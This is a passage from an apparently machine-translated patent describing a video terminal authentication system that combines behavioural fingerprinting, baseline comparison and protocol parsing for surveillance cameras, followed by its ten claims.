[0079] 5. Bottom Terminal Device Layer: IoT Terminal Devices. This layer is the system's monitoring object and data source, providing raw terminal-side data for upper-layer verification. Each terminal group contains multiple video surveillance cameras and an agent (lightweight security probe) deployed on the terminal side. The core capabilities of the terminal side are as follows: Behavior monitoring and collection: The agent monitors the terminal's access behavior in real time based on three preset behavior monitoring points: file writing, network connection, and process creation. Behavioral fingerprint generation: The continuous behavioral sequence monitored is compressed into a lightweight behavioral fingerprint vector through a Markov chain model. Only the fingerprint hash value is uploaded, which greatly reduces the transmission bandwidth consumption. Trusted access control: All video terminals must pass the authentication and verification of the video security access gateway before they can access the system, realizing trusted control of the terminal throughout its entire lifecycle.
[0080] The complete data flow loop of the above method is as follows: Baseline construction phase (first-time network access / firmware upgrade of terminal): The terminal agent collects terminal software attributes and behavioral characteristics - uploads them to the video security access gateway - aggregates them to the intelligent hub - builds trusted software baseline and behavioral baseline - synchronizes them to the baseline library - distributes them to the gateway, and completes the initial construction of the trusted baseline of the terminal.
[0081] During routine operation (terminals are continuously online): The terminal agent collects behavioral data in real time, generates behavioral fingerprints, and uploads them to the gateway. The gateway calculates the behavioral deviation based on the baseline and performs in-depth analysis and verification of the protocol signaling. The gateway reports the verification results to the intelligent hub. The intelligent hub executes authentication control based on a three-layer priority policy. The gateway executes corresponding operations (blocking / alarming / allowing), while the intelligent hub dynamically optimizes the baseline and policies, forming a complete security protection closed loop of "collection-verification-control-optimization".
[0082] The above-mentioned video terminal authentication control method has the following technical effects: Significantly improved detection depth and accuracy: By integrating terminal behavior and network protocol analysis, this solution breaks through the limitations of single-point defense. For example, if an internal terminal is manipulated to send abnormal video streams, this solution can detect the abnormal network connection behavior of the process from the terminal and identify the violation of the video stream protocol fields from the gateway side, achieving cross-validation and greatly reducing false positives and false negatives.
[0083] Intelligent defense and improved operation and maintenance efficiency: The three-layer priority system resolves conflicts between multiple policies, and the attack behavior fusion technology avoids duplicate alarm matching, directly optimizing automatic response issues. At the same time, no manual policy updates are required, which greatly improves operation and maintenance efficiency.
[0084] Corresponding to the above embodiments of the video terminal authentication control method, this invention also provides a video terminal authentication control system, such as... Figure 3 As shown, the system includes: Acquisition Layer 310: Used to set behavior monitoring points based on kernel environment parameters of the video terminal, construct a behavior baseline through the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy through the protocol feature bytes of the video terminal; Access Layer 320: Used to monitor the access behavior of video terminals in real time using behavior monitoring points, and generate behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior; Control layer 330: Used to calculate the behavioral deviation between behavioral fingerprint data and behavioral baseline, and to obtain the protocol verification result of access behavior after parsing and verifying the protocol signaling of access behavior using the protocol parsing strategy. Application Layer 340: Used to control the video terminal to perform the authentication process based on behavior deviation and protocol verification results.
[0085] Specifically, such as Figure 4 The diagram shows another video terminal authentication control system, which, from bottom to top, consists of "acquisition layer 310 - access layer 320 - control layer 330 - application layer 340". It fully matches the technical solution of the aforementioned video terminal authentication control method, and constructs a full-process security closed loop from terminal data acquisition, full protocol adaptation, intelligent authentication management and control to business visualization operation and maintenance. It specifically addresses the three core pain points of existing technologies: "terminal agnosticity, unseen counterfeiting, and unintelligent policies". At the same time, it forms a complete technical mapping with the preceding system architecture diagram.
[0086] Acquisition Layer 310: Video Security Access Switching Layer (Data Entry and Terminal Perception Layer). The acquisition layer is the source of raw data and the foundation for terminal perception of the entire system. Deployed on the video terminal side / access side, it provides full-dimensional raw data support for upper-layer baseline construction, behavior verification, and protocol parsing. It is a fundamental link in solving the problem of "terminal agnosticness".
[0087] The video and audio transmission submodule is responsible for carrying the raw business traffic such as real-time audio and video streams from the video terminal camera, PTZ control signaling, and device status data. It is the source of all access behaviors and protocol signaling.
[0088] The static fingerprint collection submodule is responsible for collecting static attribute information such as filename, version number, SHA-256 hash value of executable files in the critical path of the terminal system, as well as terminal IP / MAC address and manufacturer identification during the initial network access / firmware upgrade of the terminal; and collecting dynamic behavior characteristics of the terminal (processes, ports, connections, file operations) during daily operation and maintenance.
[0089] The data interface transmission submodule functions as follows: It compresses the collected behavioral data into behavioral fingerprint vectors (only the hash value is uploaded) through the lightweight proxy probe on the terminal side, and transmits them to the upper-layer gateway with low bandwidth; at the same time, it carries the control signaling interaction between the terminal and the gateway.
[0090] Access Layer 320: Audio and Video Image Data Access Adaptation (Full Protocol Parsing and Adaptation Layer). The access layer is a protocol deep parsing and standardization adaptation layer, which fundamentally solves the pain point of "invisible counterfeiting" in existing technologies. It achieves full-coverage deep parsing of power industry-specific protocols, vendor-owned protocols, and encryption protocols, providing standardized data support for upper-layer access control and threat detection.
[0091] The access layer is divided into three categories according to protocol type: standard public protocols, such as GB / T 28181 (video surveillance network transmission standard), GB 35114 (video surveillance information security standard, encrypted video protocol), GA / T 1400 (video image application standard), and other power / security industry-specific standard protocols.
[0092] General streaming media / security standard protocols: including general video surveillance protocols such as RTSP (Real-time Streaming Protocol), RTMP (Real-time Messaging Protocol), and OnVif (Open Video Interface Standard).
[0093] Vendor-specific protocols: Includes vendor-defined video protocols such as HIK and DaHua. By using the n-gram algorithm to extract fixed offset feature bytes and automatically construct the protocol state machine, we can achieve deep reverse analysis of the private protocols and identify illegal state transitions and malicious control commands.
[0094] The access layer completely solves the shortcomings of existing technologies that can only identify a limited number of general protocols, achieving full protocol coverage of "public + private + encryption", providing a foundation for semantic-level verification of protocol signaling and resource-level access control, and accurately identifying advanced external threats such as illegal PTZ control and unauthorized video stream access.
[0095] Control Layer 330: Intelligent Policy Control Layer (Core Authentication and Management Engine Layer). Control Layer 330 is the core management brain and authentication execution engine of the entire system. It integrates dual authentication logic based on behavior deviation and protocol verification results, executes three-level priority intelligent policies, and is the core hub for solving three major technical pain points.
[0096] The device whitelist permission submodule's function is to establish a terminal device whitelist mechanism based on trusted software baselines and behavioral baselines, allowing only legitimate terminals that meet the baseline requirements to access the system. This upgrades authentication to ontology trust, preventing internal attacks launched by compromised legitimate terminals.
[0097] The device identity authentication submodule functions as follows: it performs dual authentication based on the deviation of the execution behavior and the protocol verification result, replacing the coarse-grained authentication of traditional MAC / IP binding and pre-shared keys. It is the core execution link to solve the problem of "terminal agnosticity".
[0098] The access control submodule's function is to implement fine-grained access control at the resource level based on the operation type + target resource + operator triplet, according to protocol signaling parsing, distinguishing different operation permissions such as real-time video stream / historical recording, PTZ control / playback, etc. This module addresses external spoofing threats such as unauthorized video retrieval and unauthorized PTZ control, and is the core execution link in solving the "spoofing invisible" problem.
[0099] The protocol identification strategy submodule is responsible for dynamically identifying the protocol type of terminal traffic, matching the corresponding parsing strategy, and achieving automated identification and verification of the entire protocol.
[0100] The content filtering and inspection submodule performs compliance checks on video content, extracts and verifies digital watermarks, and defends against video replay attacks and illegal content transmission.
[0101] The functions of the data traffic control submodule are: to monitor terminal network connection behavior, control abnormal external traffic and large-scale attacks, and restrict unauthorized data transmission.
[0102] The functions of the intrusion threat strategy submodule are: to implement a three-tier priority authentication system (L1 forced blocking > L2 abnormal behavior > L3 operational continuity), automatically resolve multi-policy conflicts, and execute authentication control according to priority.
[0103] Application Layer 340: Four Major Business Centers (Visualized Operation and Maintenance Management Entry Point). Application Layer 340 serves as the system's human-computer interaction entry point and business visualization management layer. It transforms underlying authentication, control, and alarm data into operable and analyzable business functions, achieving a closed loop of visualized management and automated operation and maintenance for the entire system.
[0104] The four main sub-modules are as follows: 1. Strategy Center (Intelligent Strategy Lifecycle Management); its core function is to solve the problem of unintelligent strategies, enabling automated configuration, iteration, and optimization of strategies; specifically, it implements the following functions: Security policy distribution: Distribute authentication policies, access control rules, and protocol parsing policies to the control layer to achieve unified policy scheduling across the entire link; Strategy List Query: Visualizes the entire network's strategy list, automatically identifies and cleans up "zombie strategies" (redundant and invalid strategies), and solves the problem of strategy bloat; Intelligent adjustment baseline: Based on terminal behavior data and security events, dynamically adjust the behavior deviation threshold and protocol verification conditions to optimize the trusted software baseline and behavior baseline, and realize the automated iteration of policies.
[0105] 2. Event Center (Full Lifecycle Management of Security Events); Its core function is to achieve unified alerting, tracing, and analysis of security events across the entire network, enabling rapid threat response; Specifically, it implements the following functions: Access alarm events: Terminal access authentication anomaly alarms (such as excessive behavior deviation or protocol verification failure); Threat and intrusion incidents: Alarms for attack incidents such as unauthorized gimbal control, unauthorized video access, and firmware tampering, along with associated abnormal behavior and protocol data; Asset Abnormal Event: Alarm for abnormal terminal asset status (such as firmware version tampering, abnormal external connection).
[0106] 3. Asset Center (Full Lifecycle Management of Terminal Assets); Its core positioning is to solve the problem of "terminal agnosticness" and realize visualized management of all video terminal assets across the network; Specifically, it implements the following functions: Intelligent asset collection: Automatically collects comprehensive asset information from all network terminals, including software, hardware, network, and manufacturer information. Asset Profile Overview: Generates a unique asset profile for each terminal, encompassing "software integrity + operational behavior," providing a clear view of the terminal's trustworthiness. Risk Asset Report: Based on behavioral deviation and protocol verification results, generate statistical reports on risk assets to identify high-risk terminals.
[0107] 4. Monitoring Center (Real-time Monitoring of Network-wide Operation Status); Its core function is to achieve real-time monitoring and rapid troubleshooting of the network's security and operational status; Specifically, it implements the following functions: Traffic threshold monitoring: Real-time monitoring of video stream and network traffic thresholds, with real-time alerts for abnormal traffic.
[0108] Rapid troubleshooting: Corresponding to terminal behavior alarms and network protocol attack events, quickly pinpoint the root cause of faults / threats.
[0109] Behavioral baseline analysis: Real-time analysis of deviation trends from the terminal's behavioral baseline, and dynamic optimization of the baseline model.
[0110] The entire data flow and closed-loop logic of the aforementioned video terminal authentication control system is as follows: Data uplink (terminal-central hub): Acquisition layer (raw data acquisition) - Access layer (full protocol parsing and adaptation) - Control layer (dual authentication + policy execution) - Application layer (visual display); The terminal side agent collects behavioral data and protocol signaling - the gateway completes protocol parsing and behavioral fingerprint verification - the intelligent central hub executes policy control - the application layer displays alarms, assets, and monitoring data, completing the full-link flow of data from the terminal to the management end.
[0111] Policy downlink (central hub - terminal): Application layer (policy configuration / baseline adjustment) - Control layer (policy conversion / rule distribution) - Access layer (protocol policy update) - Collection layer (monitoring point / collection rule update); The application layer policy center distributes optimized policies and baselines - the control layer converts them into authentication rules - the access layer updates the protocol parsing policy - the collection layer updates the behavior monitoring points, realizing the full-link distribution and dynamic iteration of policies.
[0112] Automated operation and maintenance closed loop: Events, assets, and monitoring data from the application layer are continuously fed back to the policy center to dynamically optimize baselines and policies, which are then distributed to the underlying layer, forming a complete security closed loop of "collection-verification-control-optimization". This completely solves the problem of lag in manual operation and maintenance and enables the system to learn and optimize itself.
[0113] As can be seen from the above-mentioned video terminal authentication control system, the system performs dual authentication control from two analytical levels: the behavioral deviation of the video terminal and the protocol verification results. The behavioral deviation can detect the implantation of any malicious files (malicious firmware) and abnormal process activities, thereby solving the problem of "terminal agnosticism". At the same time, the protocol verification results effectively defend against illegal video access based on protocol vulnerabilities, thereby solving the problem of "impersonation invisible" access behavior. In addition, the system performs unified scheduling processing for video terminals based on behavioral deviation and protocol verification results, and can resolve conflicts of multiple policies through a multi-level priority authentication process, thereby solving the problem of "unintelligent policies".
[0114] The video terminal authentication control system provided in this embodiment of the invention has the same implementation principle and technical effects as the aforementioned video terminal authentication control method embodiment. For the sake of brevity, any parts not mentioned in the system embodiment can be referred to the corresponding content in the aforementioned video terminal authentication control method embodiment.
[0115] This embodiment also provides an electronic device, the structural schematic diagram of which is shown below. Figure 5As shown, the device includes a processor 101 and a memory 102; wherein, the memory 102 is used to store one or more computer instructions, which are executed by the processor to implement the steps of the video terminal authentication control method described above.
[0116] Figure 5 The electronic device shown also includes a bus 103 and a communication interface 104, with the processor 101, communication interface 104 and memory 102 connected via the bus 103.
[0117] The memory 102 may include high-speed random access memory (RAM) and may also include non-volatile memory, such as at least one disk storage device. The bus 103 may be an ISA bus, PCI bus, or EISA bus, etc. The bus can be divided into address bus, data bus, control bus, etc. For ease of representation, Figure 5 The symbol is represented by a single double-headed arrow, but this does not mean that there is only one bus or one type of bus.
[0118] The communication interface 104 is used to connect to at least one user terminal and other network units through a network interface, and to send encapsulated IPv4 packets or IPv4 packets to the user terminal through the network interface.
[0119] Processor 101 may be an integrated circuit chip with signal processing capabilities. In implementation, each step of the above method can be completed by the integrated logic circuitry in the hardware of processor 101 or by instructions in software form. The processor 101 can be a general-purpose processor, including a Central Processing Unit (CPU), a Network Processor (NP), etc.; it can also be a Digital Signal Processor (DSP), an Application Specific Integrated Circuit (ASIC), a Field-Programmable Gate Array (FPGA), or other programmable logic devices, discrete gate or transistor logic devices, or discrete hardware components. It can implement or execute the methods, steps, and logic block diagrams disclosed in the embodiments of this disclosure. The general-purpose processor can be a microprocessor or any conventional processor. The steps of the methods disclosed in the embodiments of this disclosure can be directly manifested as execution by a hardware decoding processor, or execution by a combination of hardware and software modules in the decoding processor. The software module can reside in a mature storage medium in the art, such as random access memory, flash memory, read-only memory, programmable read-only memory, electrically erasable programmable memory, or registers. This storage medium is located in memory 102. The processor 101 reads the information in memory 102 and, in conjunction with its hardware, completes the steps of the method described in the foregoing embodiments.
[0120] This invention also provides a storage medium storing a computer program, which, when executed by a processor, performs the steps of the video terminal authentication control method described in the foregoing embodiments.
[0121] In the several embodiments provided in this application, it should be understood that the disclosed systems, apparatuses, devices, and methods can be implemented in other ways. The system embodiments described above are merely illustrative. For example, the division of units is only a logical functional division, and in actual implementation, there may be other division methods. Furthermore, multiple units or components may be combined or integrated into another system, or some features may be ignored or not executed. Additionally, the coupling or direct coupling or communication connection shown or discussed may be through some communication interfaces; the indirect coupling or communication connection between devices or units may be electrical, mechanical, or other forms.
[0122] The units described as separate components may or may not be physically separate. The components shown as units may or may not be physical units; that is, they may be located in one place or distributed across multiple network units. Some or all of the units can be selected to achieve the purpose of this embodiment according to actual needs.
[0123] In addition, the functional units in the various embodiments of the present invention can be integrated into one processing unit, or each unit can exist physically separately, or two or more units can be integrated into one unit.
[0124] If the aforementioned functions are implemented as software functional units and sold or used as independent products, they can be stored in a processor-executable, non-volatile, computer-readable storage medium. Based on this understanding, the technical solution of this invention, essentially, or the part that contributes to the prior art, or a portion of the technical solution, can be embodied in the form of a software product. This computer software product is stored in a storage medium and includes several instructions to cause a computer device (which may be a personal computer, electronic device, or network device, etc.) to execute all or part of the steps of the methods described in the various embodiments of this invention. The aforementioned storage medium includes various media capable of storing program code, such as USB flash drives, portable hard drives, read-only memory (ROM), random access memory (RAM), magnetic disks, or optical disks.
[0125] Finally, it should be noted that the above-described embodiments are merely specific implementations of the present invention, used to illustrate the technical solutions of the present invention, and not to limit it. The scope of protection of the present invention is not limited thereto. Although the present invention has been described in detail with reference to the foregoing embodiments, those skilled in the art should understand that any person skilled in the art can still modify or easily conceive of changes to the technical solutions described in the foregoing embodiments within the technical scope disclosed in the present invention, or make equivalent substitutions for some of the technical features; and these modifications, changes, or substitutions do not cause the essence of the corresponding technical solutions to deviate from the spirit and scope of the technical solutions of the embodiments of the present invention, and should all be covered within the scope of protection of the present invention. Therefore, the scope of protection of the present invention should be determined by the scope of the claims.
Claims
1. A video terminal authentication control method, characterized in that, The method includes: Based on the kernel environment parameters of the video terminal, behavior monitoring points are set, a behavior baseline is constructed through the attribute values of executable files in the system path of the video terminal, and the protocol parsing strategy is determined through the protocol feature bytes of the video terminal. The access behavior of the video terminal is monitored in real time using the behavior monitoring points, and behavior fingerprint data is generated through the continuous behavior sequence corresponding to the access behavior. Calculate the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, and then use the protocol parsing strategy to parse and verify the protocol signaling of the access behavior to obtain the protocol verification result of the access behavior. The video terminal is controlled to perform the authentication process by using the behavior deviation and the protocol verification result.
2. The video terminal authentication control method according to claim 1, characterized in that, Monitoring points for kernel environment parameter settings based on video terminals include: The kernel environment parameters are determined based on the system kernel type of the video terminal, and the file monitoring strategy and kernel communication strategy of the video terminal are determined through the kernel environment parameters. The file writing monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy of the video terminal are determined using the file monitoring strategy and the kernel communication strategy. The video terminal's behavior monitoring points are set based on the file writing monitoring strategy, the network connection monitoring strategy, and the process creation monitoring strategy.
3. The video terminal authentication control method according to claim 1, characterized in that, A behavioral baseline is constructed using the attribute values of executable files in the system directory of the video terminal, including: When the video terminal is detected to be in firmware upgrade state or first network access state, obtain all executable files under the system path and business application path of the video terminal, and obtain the network data and manufacturer data of the video terminal. The behavioral baseline is constructed using the filename, version number, and numerical hash value in the attribute values of the executable file, the IP address and MAC address in the network data, and the ID value corresponding to the manufacturer data, according to the unique identifier value corresponding to the video terminal.
4. The video terminal authentication control method according to claim 1, characterized in that, The protocol parsing strategy is determined by the protocol feature bytes of the video terminal, including: The public video protocol corresponding to the video terminal is determined, and the first protocol parsing strategy is determined through the first protocol feature byte corresponding to the protocol feature field of the public video protocol; The private video protocol corresponding to the video terminal is determined, the offset is determined using the protocol type of the private video protocol, the second protocol feature byte of the offset is extracted according to the n-gram algorithm, and the second protocol parsing strategy is determined through the second protocol feature byte; The encrypted video protocol corresponding to the video terminal is determined. After decrypting the preset keyframes according to the boundary decryption proxy strategy and watermark audit strategy of the encrypted video protocol, the third protocol parsing strategy is determined using the generated digital watermark.
5. The video terminal authentication control method according to claim 1, characterized in that, The access behavior of the video terminal is monitored in real time using the behavior monitoring points, and behavior fingerprint data is generated through the continuous behavior sequence corresponding to the access behavior, including: The behavior monitoring points are used to monitor the file writing behavior, network connection behavior, and creation behavior of the video terminal in real time. The sequence of consecutive actions corresponding to the access action is determined according to the execution order of the creation action, the file writing action, and the network connection action. The continuous sequence of behaviors is compressed into a behavior fingerprint vector using a Markov chain model, and the hash value of the behavior fingerprint vector is used to generate the behavior fingerprint data of the access behavior.
6. The video terminal authentication control method according to claim 1, characterized in that, Calculating the behavioral deviation between the behavioral fingerprint data and the behavioral baseline includes: The calculation and execution strategy for the behavioral baseline is determined by using the file modification timestamps corresponding to the behavioral fingerprint data; The similarity comparison result between the behavioral fingerprint data and the behavioral baseline is calculated based on the calculation execution strategy. The behavioral similarity between the behavioral fingerprint data and the behavioral baseline is determined by the similarity comparison results, and the behavioral deviation is calculated based on the behavioral similarity.
7. The video terminal authentication control method according to claim 1, characterized in that, After parsing and verifying the protocol signaling of the access behavior using the aforementioned protocol parsing strategy, the protocol verification result of the access behavior is obtained, including: Obtain the protocol signaling of the access behavior, and use the protocol parsing strategy to determine the semantic parsing tree corresponding to the protocol signaling; Based on the network IP address corresponding to the protocol signaling, the operation type data, target resource data, and operator data in the message body of the protocol signaling are parsed and obtained through the semantic parsing tree; The protocol verification result of the access behavior is obtained by using the three-data set corresponding to the operation type data, the target resource data, and the operator data.
8. The video terminal authentication control method according to claim 1, characterized in that, The steps of controlling the video terminal to execute the authentication process based on the behavior deviation and the protocol verification result include: The deviation threshold and protocol verification conditions corresponding to the video terminal are determined based on the type parameter of the access behavior. If the deviation of the behavior is greater than the deviation threshold and the protocol verification result does not meet the protocol verification condition, then the authentication process is determined to be a forced blocking authentication process. If the behavior deviation is greater than the deviation threshold and the protocol verification result meets the protocol verification condition, then the authentication process is determined to be a behavior anomaly authentication process. If the deviation of the behavior is not greater than the deviation threshold and the protocol verification result meets the protocol verification condition, then the authentication process is determined to be an operational continuous process. The video terminal is controlled to execute the authentication process; wherein the priority of the forced blocking authentication process is greater than that of the abnormal authentication process, and the priority of the abnormal authentication process is greater than that of the continuous operation process.
9. A video terminal authentication control system, characterized in that, The system includes: The acquisition layer is used to set behavior monitoring points based on the kernel environment parameters of the video terminal, construct a behavior baseline through the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy through the protocol feature bytes of the video terminal. Access layer: used to monitor the access behavior of the video terminal in real time using the behavior monitoring points, and generate behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior; Control layer: Used to calculate the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, and to obtain the protocol verification result of the access behavior by parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy; Application layer: Used to control the video terminal to perform the authentication process based on the behavior deviation and the protocol verification result.
10. A video terminal authentication control device, characterized in that, The video terminal authentication control device includes a processor and a memory. The memory stores computer-executable instructions that can be executed by the processor. The processor executes the computer-executable instructions to implement the steps of the video terminal authentication control method according to any one of claims 1 to 8.